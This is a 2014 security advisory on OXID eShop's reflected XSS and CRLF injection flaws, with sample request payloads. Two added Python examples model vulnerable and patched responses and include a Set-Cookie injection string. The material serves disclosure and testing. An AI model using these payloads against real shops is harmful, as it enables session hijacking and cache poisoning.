OXID eShop XSS / CRLF Injection

Published: 20 Mar 2014 | Reported by: storm | Type: packetstorm | Source: packetstormsecurity.com

OXID eShop XSS and CRLF Injection Vulnerabilities 12/201

Related

- 0day.today: OXID eShop < 4.7.11/5.0.11 + < 4.8.4/5.1.4 - Multiple Vulnerabilities (21 Mar 2014)
- AttackerKB: CVE-2014-2016 (25 Mar 2014 18:21), CVE-2014-2017 (18 Jan 2018 14:29)
- CVE: CVE-2014-2016 (25 Mar 2014 14:00), CVE-2014-2017 (18 Jan 2018 14:00)
- Cvelist: CVE-2014-2016 (25 Mar 2014 14:00), CVE-2014-2017 (18 Jan 2018 14:00)
- Exploit DB: OXID eShop < 4.7.11/5.0.11 / < 4.8.4/5.1.4 - Multiple Vulnerabilities (20 Mar 2014)
- EUVD: EUVD-2014-2068, EUVD-2014-2069 (7 Oct 2025 00:30)
# Exploit Title: OXID eShop v<4.7.11/5.0.11 + v<4.8.4/5.1.4 Multiple Vulnerabilities  
# Google Dork: -  
# Date: 12/2013  
# Exploit Author: //sToRm  
# Author mail: [email protected]  
# Vendor Homepage: http://www.oxid-esales.com  
# Software Link: -  
# Version: All versions < 4.7.11/5.0.11 + All versions < 4.8.4/5.1.4  
# Tested on: Multiple platforms  
# CVE : CVE-2014-2016 + CVE-2014-2017 (reserved)  
  
  
###########################################################################################################  
# XSS vulnerability #######################################################################################  
  
Under certain circumstances, an attacker can trick a user into entering a specially crafted  
URI or clicking a malformed link to exploit a cross-site scripting vulnerability that  
could be used to gain unauthorized access to the user's account or to collect  
sensitive information about that user.  
  
SAMPLE: -------------------------------------------------------------------------------  
http://HOST/tag/sample/sample-name.html?cur=2&listtype=tag&pgNr=2&searchtag=[XSS]  
---------------------------------------------------------------------------------------  
  
Products:  
  
OXID eShop Enterprise Edition  
OXID eShop Professional Edition  
OXID eShop Community Edition  
  
Releases: All previous releases  
Platforms: All releases are affected on all platforms.  
  
STATE  
- Resolved in OXID eShop version 4.7.11/5.0.11 and OXID eShop version 4.8.4/5.1.4.  
- A fix for OXID eShop version 4.6.8 is available.  
  
Bulletin: http://wiki.oxidforge.org/Security_bulletins/2014-001  
  
###########################################################################################################  
###########################################################################################################  
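Whether the searchtag reflection above is exploitable depends on the HTML context the value lands in, and a tester wants a check that distinguishes "escaped" from "escaped, but not enough for an attribute". The following is an added example (editor's code, not the advisory's or OXID's): TAG_PAGE is taken from the sample URL, while the template in render_tag_page and the canary string are assumptions, since the advisory does not show how the shop echoes the parameter.

```python
"""Added illustration of the searchtag reflection (editor's example, not OXID code).
The advisory only shows the URL, so the template below is an assumption: it echoes
searchtag into both element text and an attribute value, the two contexts that
need different escaping."""
from __future__ import annotations

import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlencode, urlsplit

TAG_PAGE = "http://HOST/tag/sample/sample-name.html"  # path from the advisory's sample
CANARY = '"><canary>'  # constructed probe: a quote to break out of an attribute, then a tag


def probe_url(searchtag: str = CANARY) -> str:
    """The advisory's sample URL with [XSS] replaced by the URL-encoded probe."""
    query = urlencode({"cur": 2, "listtype": "tag", "pgNr": 2, "searchtag": searchtag})
    return f"{TAG_PAGE}?{query}"


def render_tag_page(url: str, escaping: str) -> str:
    """Model of the tag page (assumed). escaping is 'none' (vulnerable), 'text'
    (escapes & < > only: safe in text, still breaks out of an attribute) or 'attr'
    (htmlspecialchars-style: quotes escaped too, safe in both contexts)."""
    searchtag = parse_qs(urlsplit(url).query).get("searchtag", [""])[0]
    if escaping == "none":
        shown = searchtag
    elif escaping == "text":
        shown = html.escape(searchtag, quote=False)
    elif escaping == "attr":
        shown = html.escape(searchtag, quote=True)
    else:
        raise ValueError(f"unknown escaping mode {escaping!r}")
    return (
        f"<h1>Tag: {shown}</h1>\n"
        f'<input type="text" name="searchtag" value="{shown}">\n'
    )


class _DomProbe(HTMLParser):
    """Parse the page the way a browser would: record element names and the
    value the searchtag input actually ends up with."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[str] = []
        self.input_value: str | None = None

    def handle_starttag(self, tag: str, attrs: list[tuple[str, str | None]]) -> None:
        self.tags.append(tag)
        attributes = dict(attrs)
        if tag == "input" and attributes.get("name") == "searchtag":
            self.input_value = attributes.get("value")


def injected_contexts(body: str, sent: str = CANARY) -> set[str]:
    """Return the contexts the probe broke into: 'text' if <canary> became a real
    element, 'attr' if the quote terminated the input's value attribute early."""
    probe = _DomProbe()
    probe.feed(body)
    probe.close()
    hits: set[str] = set()
    if "canary" in probe.tags:
        hits.add("text")
    if probe.input_value != sent:
        hits.add("attr")
    return hits


if __name__ == "__main__":
    for mode in ("none", "text", "attr"):
        print(mode, sorted(injected_contexts(render_tag_page(probe_url(), mode))))
```

The check parses the response instead of grepping for the raw string, so it reports the same thing a browser would do with it: with the 'text' mode the angle brackets are neutralised but the unescaped quote still ends the value attribute, which is enough for an event-handler injection. Against a live host, feed the real body of the probe URL into injected_contexts and treat any non-empty result as unescaped reflection.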
  
  
  
  
  
###########################################################################################################  
# Multiple CRLF injection / HTTP response splitting #######################################################  
  
Under certain circumstances (depending on the browser, OS and PHP version), an attacker can trick a user into  
entering a specially crafted URI or clicking a malformed link to exploit an HTTP response splitting vulnerability  
that could be used to poison caches, gain unauthorized access to the user's account or collect  
sensitive information about that user.  
  
Passing such a malformed URI could:  
- return a blank page or a PHP error (depending on the server configuration)  
- set unsolicited browser cookies  
  
Products:  
  
OXID eShop Enterprise Edition  
OXID eShop Professional Edition  
OXID eShop Community Edition  
  
Releases: All previous releases  
Platforms: All releases are affected on all platforms.  
  
STATE:  
- Resolved in OXID eShop version 4.7.11/5.0.11 and OXID eShop version 4.8.4/5.1.4.  
- A fix for OXID eShop version 4.6.8 is available.  
  
Bulletin: http://wiki.oxidforge.org/Security_bulletins/2014-002  
  
  
Vulnerability details:  
  
###########################################################################################################  
# 1 # CRLF injection / HTTP response splitting ############################################################  
  
PATH: ROOT/index.php  
PARAMETER: anid  
  
CONCEPT: --------------------------------------------------------------------------------------------------  
actcontrol=start  
&aid=1  
&am=1  
&anid=%0d%0a%20[INJECT:INJECT]  
&cl=start  
&fnc=tobasket  
&lang=0  
&pgNr=0  
&stoken=1  
-----------------------------------------------------------------------------------------------------------  
  
SAMPLE:  
--- POST /index.php HTTP/1.1 ------------------------------------------------------------------------------  
actcontrol=start&aid=1&am=1&anid=%0d%0a%20INJECTED:INJECTED_DATA&cl=start&fnc=tobasket&lang=0&pgNr=0&stoken=1  
-----------------------------------------------------------------------------------------------------------  
###########################################################################################################  
###########################################################################################################  
  
  
  
  
  
###########################################################################################################  
# 2 # CRLF injection / HTTP response splitting ############################################################  
  
PATH: ROOT/index.php  
PARAMETER: cnid  
  
CONCEPT: --------------------------------------------------------------------------------------------------  
actcontrol=details  
&aid=1  
&am=1  
&anid=0  
&cl=details  
&cnid=%0d%0a%20[INJECTED:INJECTED]  
&fnc=tobasket  
&lang=0  
&listtype=list  
&panid=  
&parentid=1  
&stoken=1  
&varselid%5b0%5d=  
-----------------------------------------------------------------------------------------------------------  
  
SAMPLE:  
--- POST /index.php HTTP/1.1 ------------------------------------------------------------------------------  
actcontrol=details&aid=1&am=1&anid=0&cl=details&cnid=%0d%0a%20INJECTED:INJECTED_DATA&fnc=tobasket&lang=0&listtype=list&panid=&parentid=1&stoken=1&varselid%5b0%5d=  
-----------------------------------------------------------------------------------------------------------  
###########################################################################################################  
###########################################################################################################  
  
  
  
  
  
###########################################################################################################  
# 3 # CRLF injection / HTTP response splitting ############################################################  
  
PATH: ROOT/index.php  
PARAMETER: listtype  
  
CONCEPT: --------------------------------------------------------------------------------------------------  
actcontrol=details  
&aid=1  
&am=1  
&anid=0  
&cl=details  
&cnid=0  
&fnc=tobasket  
&lang=0  
&listtype=%0d%0a%20[INJECTED:INJECTED]  
&panid=  
&parentid=0  
&stoken=0  
&varselid%5b0%5d=  
-----------------------------------------------------------------------------------------------------------  
  
SAMPLE:  
--- POST /index.php HTTP/1.1 ------------------------------------------------------------------------------  
actcontrol=details&aid=1&am=1&anid=0&cl=details&cnid=0&fnc=tobasket&lang=0&listtype=%0d%0a%20INJECTED:INJECTED_DATA&panid=&parentid=0&stoken=0&varselid%5b0%5d=  
-----------------------------------------------------------------------------------------------------------  
###########################################################################################################  
###########################################################################################################  
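The three cases above share one mechanism: the value of anid, cnid or listtype reaches a response header with its CR LF bytes intact. The samples inject %0d%0a%20, that is CR LF followed by a space, which is a folded header line: PHP 5.x's header() rejected a bare newline but let a newline followed by a space or tab through as RFC 2616 header folding, and a client that does not fold such lines reads the continuation as a separate header. That is why the advisory ties exploitability to the PHP version and the browser. The block below is an added example (editor's code, not OXID's); the server side is modelled, since the advisory shows only the requests, and the assumption is that the parameter is copied unencoded into a redirect Location header. It renders the vulnerable and the hardened response and parses each with a folding-aware and a naive client.

```python
"""Model of the CRLF injection in the advisory plus the hardened form.
Added illustration, not OXID eShop code: the advisory shows only the requests,
so the server side (parameter copied into a Location header) is an assumption."""
from __future__ import annotations

from urllib.parse import quote, unquote

# Constructed payloads shaped like the advisory's "%0d%0a%20INJECTED:INJECTED_DATA".
BARE_CRLF = "%0d%0aSet-Cookie:%20sid=attacker"       # CR LF, then a new header line
FOLDED_CRLF = "%0d%0a%20Set-Cookie:%20sid=attacker"  # CR LF SP: a folded (obs-fold) line


def safe_header_value(value: str) -> str:
    """Hardened guard: refuse any CR, LF or NUL in a header value, as current
    PHP header() does (no folding exception)."""
    if any(c in value for c in "\r\n\0"):
        raise ValueError("control character in header value")
    return value


def render_redirect(anid: str, hardened: bool) -> bytes:
    """Raw HTTP response the shop is assumed to send for fnc=tobasket."""
    decoded = unquote(anid)  # PHP decodes %0d%0a into real CR LF before the app sees it
    if hardened:
        # Re-encode the value as a URL query component, then guard the header anyway.
        param = safe_header_value(quote(decoded, safe=""))
    else:
        param = decoded  # vulnerable: raw bytes land inside the Location header
    response = (
        "HTTP/1.1 302 Found\r\n"
        f"Location: http://HOST/index.php?cl=basket&anid={param}\r\n"
        "Content-Length: 0\r\n"
        "\r\n"
    )
    return response.encode("latin-1")


def parse_headers(raw: bytes, fold_continuations: bool) -> list[tuple[str, str]]:
    """Parse the header block of a raw response. fold_continuations=True behaves
    like an obs-fold-aware client (a line starting with SP/HT continues the
    previous header); False behaves like a naive one-line-per-header client."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")[1:]  # drop the status line
    headers: list[tuple[str, str]] = []
    for line in lines:
        if fold_continuations and line[:1] in (" ", "\t") and headers:
            name, value = headers[-1]
            headers[-1] = (name, value + " " + line.strip())
            continue
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return headers


def header_names(anid: str, hardened: bool, fold_continuations: bool) -> list[str]:
    """Header names a client of the given kind sees for a given anid value."""
    return [name for name, _ in parse_headers(render_redirect(anid, hardened), fold_continuations)]


if __name__ == "__main__":
    for label, payload in (("bare", BARE_CRLF), ("folded", FOLDED_CRLF)):
        for hardened in (False, True):
            for fold in (True, False):
                print(label, "hardened" if hardened else "vulnerable",
                      "folding-client" if fold else "naive-client",
                      header_names(payload, hardened, fold))
```

Read the output as a matrix: the bare CR LF payload yields a Set-Cookie header for every client but is exactly what PHP 5's header() check refused, while the folded payload slips past that check and still becomes a Set-Cookie header for a client that does not fold. The hardened path leaves the injected bytes as %0D%0A%20 inside the Location value for both clients; URL-encoding the query component is the real fix, and the control-character guard is the belt-and-braces check that makes any remaining leak fail loudly instead of splitting the response.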
  
  
  
Many greetings to all lunatics and freaks out there who live daily in the code like me and my partners.  
Thanks to the developers, who responded relatively quickly.  
  
Cheers!  
//sToRm  
  
  
